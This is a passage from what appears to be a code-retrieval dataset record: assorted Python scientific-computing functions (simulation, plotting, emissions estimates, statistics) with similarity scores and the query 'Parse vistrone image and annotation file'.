ic50[indx]\n\n indx = np.argwhere(dr_ranks==g)\n indx = indx[0][0]\n drugless_rates_new[k] = dr[indx]\n k+=1\n\n # drugless_rates_new = pop.drugless_rates\n\n if pop.fitness_data == 'estimate':\n i = 0\n for key in pop.seascape_lib.keys():\n pop.seascape_lib[key]['ic50'] = ic50_new[i]\n pop.seascape_lib[key]['g_drugless'] = drugless_rates_new[i]\n i+=1\n\n return drugless_rates_new,ic50_new", "def _get_fibonnaci_level(self, prc):\n # position is lower-left ROI\n # use x_min and y_min with width and height to find the position\n # on the graph.\n pos = self.roi.getState()['pos']\n size = self.roi.getState()['size']\n\n y_min = pos[1]\n y_max = pos[1] + size[1]\n variation = y_max - y_min\n\n retracement = []\n retrc = variation * (prc / 100)\n value = y_min + retrc\n retracement.append(value)\n\n return retracement", "def curve(self):\n return (sum(np.outer(basis_function * weight, control_point) for basis_function, control_point, weight in zip(self.basis, self.control_points, self.weights)).T /\n sum(basis_function * weight for basis_function, weight in zip(self.basis, self.weights)).T)", "def burning_residues(self):\n 
burninginput = self.soil_inputs.residues_input.values[0]\n\n crop = self.soil_inputs.crop.values[0]\n\n if self.language == \"spanish\":\n col_name = \"crop_spanish\"\n else:\n col_name = \"Crop\"\n\n slope_above_ground = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Slope_above ground residue'].values[0]\n drymatter_factor = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'DRY(Dry matter fraction of harvested product)'].values[0]\n intercept_factor = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Intercept_above ground residue'].values[0]\n ratiobelowground_residue = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Ratio of belowground to aboveground residue'].values[0]\n\n above_residues = self.crop_yield_kg_ha / 1000 * slope_above_ground * drymatter_factor + intercept_factor\n belowground_residue = above_residues * ratiobelowground_residue\n total_biomas = belowground_residue + above_residues\n\n if ((burninginput == \"quema\") | (burninginput == \"burning\")):\n burningCH4_emissions_kg = above_residues * (ef.burned_CH4factor / 1000) * 1000\n burningN2O_emissions_kg = above_residues * (ef.burned_N2Ofactor / 1000) * 1000\n\n else:\n burningCH4_emissions_kg = 0\n burningN2O_emissions_kg = 0\n\n burning_CH4emissions_kg_CO2eq = burningCH4_emissions_kg * ef.pc_CH4\n burning_N2Oemissions_kg_CO2eq = burningN2O_emissions_kg * ef.pc_N2O_MOT\n total_burning_kg_CO2eq = burning_N2Oemissions_kg_CO2eq + burning_CH4emissions_kg_CO2eq\n\n return (total_burning_kg_CO2eq)", "def apointbiserialr(x,y):\r\n TINY = 1e-30\r\n categories = pstats.aunique(x)\r\n data = pstats.aabut(x,y)\r\n if len(categories) <> 2:\r\n raise ValueError, \"Exactly 2 categories required (in x) for pointbiserialr().\"\r\n else: # there are 2 categories, continue\r\n codemap = pstats.aabut(categories,N.arange(2))\r\n recoded = pstats.arecode(data,codemap,0)\r\n x = pstats.alinexand(data,0,categories[0])\r\n y = pstats.alinexand(data,0,categories[1])\r\n xmean = amean(pstats.acolex(x,1))\r\n ymean = amean(pstats.acolex(y,1))\r\n n = len(data)\r\n adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))\r\n rpb = (ymean - xmean)/asamplestdev(pstats.acolex(data,1))*adjust\r\n df = n-2\r\n t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n return rpb, prob", "def __CalculateLength(self, curve):\r\n return cv2.arcLength(curve, True)", "def _image_deviation(params):\n # generate the droplet\n data_flat[free] = params\n droplet.data = unstructured_to_structured(data_flat, dtype=dtype)\n droplet.check_data()\n img = droplet._get_phase_field(phase_field.grid)[mask]\n return img - data_mask", "def rho(self, Ppump):\n\n etaP, EsatL, TR = self.etaP, self.EsatL, self.TR\n return(self.Psteady(Ppump) * etaP / (EsatL * TR * self.w0(Ppump)**2))", "def get_sharpe_ratio(allocs, prices):\n\tport_val = get_portfolio_value(prices, allocs, start_val=1.0)\n\tsharpe_ratio = get_portfolio_stats(port_val, daily_rf=0.0, samples_per_year=252)[3]\n\treturn -sharpe_ratio", "def beta_gen_slope(p):\n cardi = 0.005\n return np.array( [0]*int(p-int(cardi*p)) + list(np.arange(1, int(cardi*p)+1, 1)) )", "def exner_function(pressure, reference_pressure=P0):\n return (pressure / reference_pressure)**kappa", "def compute(self): \n Ex=np.zeros((self.nx,self.ny+1))\n Ey=np.zeros((self.nx+1,self.ny))\n Hz=np.zeros((self.nx,self.ny))\n Hzx=np.zeros((self.nx,self.ny))\n Hzy=np.zeros((self.nx,self.ny))\n \n imx = 
[]\n #eps, mu = self.makeenv()\n mu=np.ones((self.nx,self.ny))*const.mu_0\n eps = self.luneberg(int(self.nx/2), int(self.ny*2/3), self.R)\n eps[:20,:] *= self.q #adself.ds a space of higher permittivity \n eps[-20:,:] *= self.q #adself.ds a space of higher permittivity \n eps[:,:20] *= self.q #adself.ds a space of higher permittivity \n eps[:,-20:] *= self.q #adself.ds a space of higher permittivity \n\n c = self.dt/(eps*self.ds)\n d = self.dt/(mu* self.ds)\n \n sigma = self.pml(eps, mu, 20)\n cax = 1 - (sigma[0] * self.dt / eps)\n cay = 1 - (sigma[1] * self.dt / eps)\n dax = 1 - (sigma[2] * self.dt / mu) \n day = 1 - (sigma[3] * self.dt / mu)\n \n bar = progressbar.ProgressBar()\n for n in bar(range(self.nt+1)):\n Ex[:,1:-1] = (cay[:,1:]+cay[:,:-1])/2*Ex[:,1:-1] + (c[:,1:]+c[:,:-1])/2*(Hz[:,1:]-Hz[:,:-1])\n Ey[1:-1,:] = (cax[1:,:]+cax[:-1,:])/2*Ey[1:-1,:] - (c[1:,:]+c[:-1,:])/2*(Hz[1:,:]-Hz[:-1,:])\n \n Hzx = dax*Hzx - d*(Ey[1:,:] - Ey[:-1,:])\n Hzy = day*Hzy + d*(Ex[:,1:] - Ex[:,:-1]) \n Hz = Hzx + Hzy + self.actualsource(self.source, self.f, n, self.dt) \n \n if(n%self.interval == 0): imx.append(Ex[:self.nx,:self.ny]**2 + Ey[:self.nx, :self.ny]**2)\n\n return imx", "def get_reward(self, physics):\n current_mask = np.any(self.image < 100, axis=-1).astype(int)\n area = np.sum(current_mask * self.mask)\n reward = area / np.sum(self.mask)\n\n return reward", "def curve(self):\n return sum(np.outer(basis_function, control_point) for basis_function, control_point in zip(self.basis, self.control_points)).T", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def plot_sum(self):\n fig, ax = plt.subplots()\n ax.set_title(\"Unpolarized intensity: I_up + I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n\n if (self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_sum = np_up + np_down\n np_sum_mod = np_up_mod + np_down_mod\n np_ssum = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n 
elif (self.is_attribute(\"time\") & self.is_attribute(\"intensity\") & \n self.is_attribute(\"intensity_total\") &\n self.is_attribute(\"intensity_sigma\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_sum = numpy.array(self.intensity, dtype=float)\n np_sum_mod = numpy.array(self.intensity_total, dtype=float)\n np_ssum = numpy.array(self.intensity_sigma, dtype=float)\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def plotxy_image(self, *args, **kws):\n _beam = kws.get('beam', 'star.01')\n _col1 = kws.get('col1', 1)\n _col2 = kws.get('col1', 3)\n _nbins = kws.get('nbins', 101)\n _nolost = kws.get('nolost', 1)\n _title = kws.get('title', r'Image')\n _xtitle = kws.get('xtitle', 'x - sagittal (Hor. focusing) [cm]')\n _ytitle = kws.get('ytitle', 'z - meridional (E dispersion) [cm]')\n _xrange = kws.get('xrange', None)\n _yrange = kws.get('yrange', None) \n _calfwhm = kws.get('calfwhm', 1)\n _level = kws.get('level', 15)\n _noplot = kws.get('noplot', 0)\n _contour = kws.get('contour', 6)\n return self.plotxy(_beam, _col1, _col2, nbins=_nbins, nolost=_nolost,\\\n title=_title, xtitle=_xtitle, ytitle=_ytitle,\\\n xrange=_xrange, yrange=_yrange,\\\n calfwhm=_calfwhm, noplot=_noplot,\\\n contour=_contour, level=_level)", "def surface_runoff_flux(runoff, drain):\n return runoff - drain", "def make_binning(img, skip=5):\n table = Table.read(\"ellipse.txt\", format=\"ascii\")\n table = table[table[\"sma\"]>10]\n table = table[::skip]\n data, norm = make_masked_img(img)\n ydim, xdim = data.shape\n x, y = np.meshgrid(np.arange(xdim)+1, np.arange(ydim)+1)\n ##########################################################################\n # Set the value of the geometric parameters for the inner region to\n # ignore the dust lane.\n sma_inn = 20\n idxinn = np.where(table[\"sma\"]<=sma_inn)[0]\n e_inn = table[idxinn][\"ellipticity\"][-1]\n pa_inn = table[idxinn][\"pa\"][-1]\n ###########################################################################\n bintable = []\n for i, isophote in enumerate(table):\n ellip = e_inn if isophote[\"sma\"] <= sma_inn else isophote[\"ellipticity\"]\n pa = pa_inn if isophote[\"sma\"] <= sma_inn else isophote[\"pa\"]\n bintable.append([isophote[\"sma\"], ellip, pa])\n e = Ellipse2D(amplitude=1., x_0=213, y_0=235, a=isophote[\"sma\"],\n b=isophote[\"sma\"] * (1 - ellip),\n theta=np.deg2rad(pa))\n if i==0:\n binning = e(x,y)\n continue\n outer = e(x,y)\n ring = np.where((outer>0) & (binning==0))\n binning[ring] = i+1\n binning[binning==0] = np.nan\n bintable = np.array(bintable)\n table = Table(bintable, names=[\"sma\", \"ellipticity\", \"pa\"])\n binning[data.mask] = np.nan\n hdu0 = fits.PrimaryHDU(binning)\n hdu1 = fits.BinTableHDU(table)\n hdulist = fits.HDUList([hdu0, hdu1])\n hdulist.writeto(\"ellipse_binning_v0.fits\", overwrite=True)", "async def get_pressure(self) -> float: # type: 
ignore\n ...", "def podziel(self):\n def fraktal(dlugosc, alpha, poziom):\n \"\"\"Metoda wyznaczajaca fraktal.\n\n Metoda ta przyjmuje dlugosc, kat oraz poziom drzewa.\n Na bazie podanych parametrow wylicza fraktal z podanych w zadaniu wzorow.\n Zwraca liste zawierajaca punkX oraz punktY fraktalu.\n \"\"\"\n#obliczanie punktow punktu Abis dla kazdego poziomu galezi\n x = float(self.p2[0] + self.dlugosc * cos(alpha))\n y = float(self.p2[1] + self.dlugosc * sin(alpha))\n return [round(x), round(y)]\n\n#petla przechodzaca po wszystkich poziomach drzewa\n while self.tmp <= self.poziom:\n#obliczanie grubosci, dlugosci galezi oraz kolorowanie jej\n self.grubosc = float((2 * self.grubosc + 1) / 3)\n self.dlugosc = float((2 * self.dlugosc) / 3)\n self.kolor += 6\n\n #sprawdzenie czy kolor nie wyszedl po za skale maksymalnej wartosci\n if self.kolor > 255:\n self.kolor = 255\n\n#rozbicie obliczen na poziom 1 i wyzej\n#Abis jest to punkt prawy dla kazdej galezi\n#B jest to punkt srodkowy dla kazdej galezi\n#C jest to punkt srodkowy dla kazdej galezi\n\n#obliczenia dla pierwszego poziomu\n if self.tmp < 2:\n#obliczenie fraktalu, prawa galaz dla kazdej galezi\n#podstawienie obliczonych wartosci z punktu Abis do pozostalych wedlug podanych wzorow\n Abis = fraktal(self.dlugosc, self.alpha, self.poziom)\n B = [round(self.p2[0]), round(Abis[1])]\n C = [round(-Abis[0] + 2 * self.p2[0]), round(Abis[1])]\n\n#zwiekszenie poziomu drzewa o jeden\n self.tmp += 1\n\n#tutaj nastepuje zwrocenie obiektow typu Branch z nowo obliczonymi wartosciami\n return [Branch(self.p2, Abis, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp),\n Branch(self.p2, B, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp),\n Branch(self.p2, C, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp)]\n#obliczenia poziomow wyzej niz pierwszy\n else:\n#obliczanie kata dla punktu prawego\n self.zetprim = randint(-1, 1) * randint(1, self.s)\n self.beta = self.alpha + self.zetprim\n\n#obliczanie kata dla punktu srodkowego\n self.zetbis = randint(-1, 1) * randint(1, self.s)\n self.gamma = self.alpha + self.zetbis\n\n#obliczanie kata dla punktu lewego\n self.zetter = randint(-1, 1) * randint(1, self.s)\n self.teta = self.alpha + self.zetter\n\n#obliczenie fraktalu, prawa galaz dla kazdej galezi\n#podstawienie obliczonych wartosci z punktu Abis do pozostalych wedlug podanych wzorow\n Abis = fraktal(self.dlugosc, self.beta, self.poziom)\n B = [round(self.p2[0]), round(Abis[1])]\n C = [round(-Abis[0] + 2 * self.p2[0]), round(Abis[1])]\n\n#zwiekszenie poziomu drzewa o jeden\n self.tmp += 1\n\n#tutaj nastepuje zwrocenie obiektow typu Branch z nowo obliczonymi wartosciami\n return [Branch(self.p2, Abis, self.dlugosc, self.grubosc, self.kolor, self.beta, self.tmp),\n Branch(self.p2, B, self.dlugosc, self.grubosc, self.kolor, self.gamma, self.tmp),\n Branch(self.p2, C, self.dlugosc, self.grubosc, self.kolor, self.teta, self.tmp)]", "def areaFraction(nb_probes, I):\n P = np.random.randint(I.shape[0], size=(nb_probes, 2))\n\n # count the number of probes in phase\n count = np.sum(I[P[:, 0], P[:, 1]])\n\n# fig=plt.figure();\n# plt.imshow(I);\n# plt.plot(P[:,0], P[:,1], '+');\n# plt.show();\n# fig.savefig('areaFrac.pdf', bbox_inches='tight');\n return float(count) / nb_probes", "def func_Ip_318(pp, pd):\n return pp/(np.pi*(pd/2)**2)", "def deltaGoverRs(self,baselinePercentile=20,save=True):\n self.dGoRs=np.empty((len(self.rois),len(self.timeH)))*np.nan\n for roiNum in range(len(self.rois)):\n try:\n 
self.dGoRs[roiNum]=self.deltaGoverR(roiNum,baselinePercentile)\n except:\n print(\"FAILED ON ROI:\",roiNum)\n winsound.Beep(440, 1000) # frequency, duration", "def pi(self,sigma,y0=0.5):\n y = y0\n for k in range(len(sigma)-1,-1,-1):\n if sigma[k]==0:\n y = self.if0(y)\n else:\n y = self.if1(y)\n return y" ]
[ "0.5753122", "0.56378067", "0.55967945", "0.55486226", "0.5391032", "0.53572434", "0.5309457", "0.52709997", "0.5266623", "0.5236764", "0.5235034", "0.52270055", "0.520521", "0.51976097", "0.5173026", "0.51659435", "0.5153408", "0.51311153", "0.51155776", "0.51090014", "0.5108218", "0.5106356", "0.50945437", "0.5075923", "0.50653666", "0.50465643", "0.5035498", "0.50311834", "0.50284386", "0.50258243", "0.5021636", "0.5017125", "0.5017125", "0.5015763", "0.500452", "0.50027764", "0.49964654", "0.4983807", "0.49687645", "0.49645397", "0.4951933", "0.49319655", "0.49300805", "0.4927638", "0.49274918", "0.4925793", "0.49157247", "0.49030796", "0.49004295", "0.4898749", "0.4898739", "0.48968396", "0.48937637", "0.48887685", "0.48841965", "0.48789224", "0.48668483", "0.48634315", "0.4862663", "0.48606664", "0.48597386", "0.4858111", "0.48533082", "0.48491177", "0.48471898", "0.48402804", "0.4838697", "0.4836155", "0.48324937", "0.48249272", "0.4822698", "0.48163867", "0.48143402", "0.48137337", "0.48108417", "0.4808711", "0.48043603", "0.48022544", "0.4797836", "0.47926977", "0.47921908", "0.47896084", "0.4788835", "0.4788759", "0.47808078", "0.47775972", "0.47770208", "0.47763804", "0.47759593", "0.47751212", "0.47728908", "0.47678256", "0.47646505", "0.47643724", "0.47641152", "0.47597", "0.4755014", "0.4751454", "0.47505307", "0.47497302" ]
document_score: 0.54940647
document_rank: 4
query: computes the sigmoid of z z z can be a matrix, vector or scalar sigmoid
def sigmoid(z): g = np.zeros(z.shape) # ====================== YOUR CODE HERE ====================== # Instructions: Compute the sigmoid of each value of z (z can be a matrix, # vector or scalar). return 1/(1+np.exp(-z))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sigmoid(z):\r\n \r\n return vSigmoid(z);", "def sigmoid(z): \n return 1/(1 + np.e**(-z))", "def sigmoid(z):\r\n \r\n return 1.0 / (1.0+np.exp(-z))", "def sigmoid(z):\n\treturn 1.0/(1.0+np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + np.exp(-1 * z))", "def sigmoid(z):\n\n s = 1/(1+ np.exp(-z));\n return s;", "def sigmoid(z):\n return 1.0 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1/(1 + numpy.exp(z))", "def sigmoid(z):\n\n\ts = 1 / (1 + np.exp(-z)) #definition of the sigmoid function\n\treturn s", "def sigmoid(z):\n return 1/(1+np.exp(-z))", "def sigmoid(z):\n\n S = (1 / (1 + np.exp(-z)))\n return S", "def sigmoid(z):\n return 1 / (1 + (np.exp(-z)))", "def sigmoid(z):\n\n s = 1/(1+ np.exp(-z))\n \n return s", "def sigmoid(z):\n s = 1./(1. + np.exp(-z))\n\n return s", "def sigmoid(z):\n s = 1.0 / (1+np.exp(-z))\n return s", "def sigmoid(z):\n # print \"sigmoid input:\", z\n return 1.0 / (1.0 + math.exp(- z))\n # return math.tanh(z)", "def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + e ** -z)", "def sigmoid(z):\n g = 1/(1 + np.exp(-z))\n return g", "def sigmoid(self, z):\n\n s = 1 / (1 + np.exp(-z))\n\n return s", "def _sigmoid(self, z):\n \n return np.power(1. + np.exp(-z), -1)", "def sigmoid(z):\n g = (1 + np.exp(-z))**-1\n return g", "def sigmoid(z):\n \n return 1 / (1 + np.exp(-z))#your code here", "def sigmoid_function(z):\n\n return 1 / (1 + math.exp(-z))", "def __sigmoid(z, derivative=False):\n if derivative:\n return z * (1 - z)\n else:\n return 1 / (1 + np.exp(-z))", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(-Z))\n\n return A", "def sigmoid(z):\n\n ### START CODE HERE ### (≈ 1 line of code)\n s = 1 / (1 + np.exp(-z))\n ### END CODE HERE ###\n\n return s", "def sigmoid_activation_function(z):\n val = 1 / (1 + np.exp(-z))\n return val", "def diff_sigmoid(z):\r\n diff_z = np.multiply(z, (1.0 - z))\r\n return diff_z\r\n pass", "def deriv_sigmoid(self,z):\n return np.exp(-z) / ( (1 + np.exp(-z)) ** 2 )", "def activation(z):\n # formula for sigmoid\n return 1 / (1 + np.exp(-z))", "def sigmoid(z: float) -> float:\n epsilon = 1e-5\n return min(max(1 / (1 + math.e ** -z), epsilon), 1 - epsilon)", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(Z))\n\n internal_params = Z\n return A, internal_params", "def sigmoid(x):\n pos_mask = (x >= 0)\n neg_mask = (x < 0)\n z = np.zeros_like(x)\n z[pos_mask] = np.exp(-x[pos_mask])\n z[neg_mask] = np.exp(x[neg_mask])\n top = np.ones_like(x)\n top[neg_mask] = z[neg_mask]\n return top / (1 + z)", "def sigmoid_gradient(z):\n #derivative of sigmoid\n return z * (1 - z)", "def sigmoid(Z):\n A = 1.0 / (1 + np.exp(-Z))\n cache = Z\n return A, cache", "def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(-Z))\n cache = Z\n\n return A, cache", "def sigmoid(Z):\n\t\n\tA = 1/(1+np.exp(-Z))\n\tcache = Z\n\t\n\treturn A, cache", "def sigmoid(x):\n\treturn 1 / (1 + m.exp(-x))", "def sigmoid(x):\r\n\r\n return 1 / (1 + np.exp(-x))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))\n # return np.log(1+np.exp(z))", "def sigmoid(x):\n return 1 / (1 * np.exp(-x))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid(Z):\n\n A = 1.0/(1.0+np.exp(-Z))\n cache = Z\n\n return A, cache", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def 
sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid_prime(self, z):\n return self.sigmoid(z)*(1-self.sigmoid(z))", "def sigmoid(x):\n return 1 / (1 + exp(-x))", "def sigmoid(x):\n return 1 / (1 + exp(-x))", "def sigmoid(x, exponent):\n \n return 1/(1+np.exp(-exponent*x))-0.5", "def sigmoid(x):\n return 1. / (1. + np.exp(-x))", "def sigmoid_prime(z): \r\n #计算 σ函数的导数 \r\n return 1.716*(1-np.tanh(2/3*z)**2)*2/3", "def sigmoid_prime(z):\r\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid(x):\n\n s = 1 / (1 + np.exp(-x))\n\n return s", "def sigmoid(X):\n if isinstance(X,(list,tuple)):\n X=np.array(X)\n return 1/(1+np.exp(-X))\n #return np.exp(X)/(1+np.exp(X))", "def sigmoid(x):\n return 1/(1+np.exp(-1*x))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x))", "def sigmoid(x):\n return 1.0/(1 + np.exp(-x))", "def get_sigmoid(arg):\n\n if arg >= 0:\n z = np.exp(-arg)\n return 1. / (1. + z)\n else:\n z = np.exp(arg)\n return z / (1 + z)", "def sigmoid(X):\n return 1 / (1 + np.exp(-X))", "def sigmoid(X):\n return 1 / (1 + np.exp(-X))", "def sigmoid(x):\n return 1 / (1 - (power(e,-x)))", "def sigmoid(x):\n s = 1 / (1 + np.exp(-x))\n return s", "def sigmoid_prime(z):\n\treturn sigmoid(z)*(1-sigmoid(z))", "def sigmoid_derivative(z):\n s = 1./(1. + np.exp(-z))\n ds = s * (1 - s)\n return ds", "def sigmoid_with_binary_xentropy(z):\n\treturn sigmoid(z)", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z: float) -> float:\n return Math.sigmoid(z) * (1 - Math.sigmoid(z))", "def sigmoid(x: np.ndarray \n ) -> np.ndarray:\n return 1/(1+np.exp(-x))", "def _sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n return 1.0/(1.0+exp(-x))", "def sigmoid(x):\r\n #pred_x = (np.exp(x) - np.exp(-x)) / (np.exp(x) + np.exp(-x))\r\n pred_x = 1.0 / (1.0 + np.exp(-x))\r\n return pred_x\r\n pass", "def sigmoid(x):\n return 1 / (1 + math.exp(-x))", "def sigmoid_prime(z):\n return cp.exp(-z) / ((1 + cp.exp(-z)) ** 2)", "def sigmoid_prime(z):\n sig_z = sigmoid(z)\n return sig_z * (1 - sig_z)", "def sigmoid(t):\n return np.exp(t)/(1+np.exp(t))", "def sigmoid_grad(z):\n return Sigmoid(z) * (1 - Sigmoid(z))", "def sigmoid_backward(a, z, g_z):\r\n exp_a = np.multiply(z, 1 - z)\r\n g_a = g_z * exp_a\r\n return g_a", "def der_sigmoid(y):\n return y * (1 - y)", "def sigmoid(t):\n return 1 / (1 + np.exp(-t))", "def sigmoid(x):\n return 1/(1 + math.exp(-x))", "def sigmoid(t):\n\n return 1.0 / (1.0 + np.exp(-t))", "def sigmoid(X):\n g = 1/(1 + np.exp(-X))\n return g", "def sigmoid(inX):\n if inX < 0:\n return 1 - 1 / (1 + exp(inX))\n else:\n return 1 / (1 + exp(-inX))" ]
[ "0.9156451", "0.89855045", "0.89530945", "0.88890535", "0.88774705", "0.8873134", "0.88591874", "0.88549364", "0.8827887", "0.88264954", "0.88236195", "0.8823586", "0.8804889", "0.8797912", "0.87720233", "0.8767488", "0.87623954", "0.87474865", "0.8720549", "0.8660843", "0.8660553", "0.8646597", "0.86425465", "0.85791135", "0.8547536", "0.84156793", "0.8364841", "0.8364031", "0.8331306", "0.83233917", "0.81467474", "0.8094835", "0.80600744", "0.80584246", "0.7824947", "0.778113", "0.7775008", "0.77450264", "0.7741867", "0.773603", "0.77322507", "0.77202934", "0.7709538", "0.76926583", "0.7691008", "0.7691008", "0.7691008", "0.76905644", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7654227", "0.7642032", "0.7642032", "0.7641056", "0.76231295", "0.7622387", "0.7618978", "0.7617016", "0.7615131", "0.76121175", "0.7611026", "0.7611026", "0.7611026", "0.7607467", "0.7603841", "0.7598353", "0.7596374", "0.7596374", "0.7580689", "0.7574388", "0.75678", "0.75439155", "0.7535291", "0.7534926", "0.7534926", "0.7534926", "0.75125325", "0.75002205", "0.7498492", "0.7484616", "0.748263", "0.748263", "0.7465236", "0.7457824", "0.7457119", "0.74357015", "0.7435615", "0.7429054", "0.7421606", "0.7420989", "0.7418978", "0.7413467", "0.74016374", "0.73732626", "0.73730993", "0.7367653" ]
document_score: 0.8674715
document_rank: 19
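For orientation between records: the fields above (query, document, metadata, negatives, negative_scores, document_score, document_rank) make up one row of the dataset. Below is a minimal, hypothetical sketch of how such a row could be consumed. It assumes the rows are exported as JSON Lines; the file name rows.jsonl, the numeric conversions, and the summary statistic are illustrative assumptions, not part of the dataset itself.

    import json

    # Hypothetical loader sketch: assumes a JSON Lines export named "rows.jsonl"
    # (placeholder name) where each line holds one row with the fields shown above.
    with open("rows.jsonl", "r", encoding="utf-8") as f:
        for line in f:
            row = json.loads(line)
            query = row["query"]                      # natural-language query text
            document = row["document"]                # positive code snippet
            negatives = row["negatives"]              # list of hard-negative snippets
            neg_scores = [float(s) for s in row["negative_scores"]]
            doc_score = float(row["document_score"])  # scores may be stored as strings
            doc_rank = int(row["document_rank"])      # rank of the positive among candidates
            # Example use: count negatives scored at least as high as the positive.
            harder = sum(1 for s in neg_scores if s >= doc_score)
            print(f"rank={doc_rank} score={doc_score:.4f} harder_negatives={harder}")

As a sanity check on the field semantics: in the sigmoid row above, 19 of the listed negative_scores exceed the document_score of 0.8674715, and in the preceding row exactly 4 exceed 0.54940647, which is consistent with document_rank counting the negatives ranked above the positive (an inference from these two rows, not a documented guarantee).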
query: Parse vistrone image and annotation file
